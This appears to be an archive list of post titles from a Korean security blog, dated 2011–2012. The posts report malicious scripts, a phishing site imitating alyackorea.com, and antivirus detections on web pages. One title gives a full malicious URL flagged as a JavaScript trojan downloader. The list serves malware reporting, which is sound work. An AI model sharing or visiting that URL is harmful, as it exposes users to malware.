| clsid:d27cdb6e-ae6d-11cf-96b8-444553540000 포함된 Script (3) | 2012.02.10 |
|---|---|
| HTML/Infected.WebPage.Gen2 APNIC KR (0) | 2012.01.29 |
| alyackorea.com 로 위장한 피싱 사이트 ! (0) | 2011.12.10 |
| http://78xxk.com/java.html (Trojan-Downloader.JS.Agent.gm) (0) | 2011.12.10 |
| 네이버 카스퍼스키 (HEUR:Trojan.Script.Iframer) 진단 사이트 보기 !! (2) | 2011.11.19 |
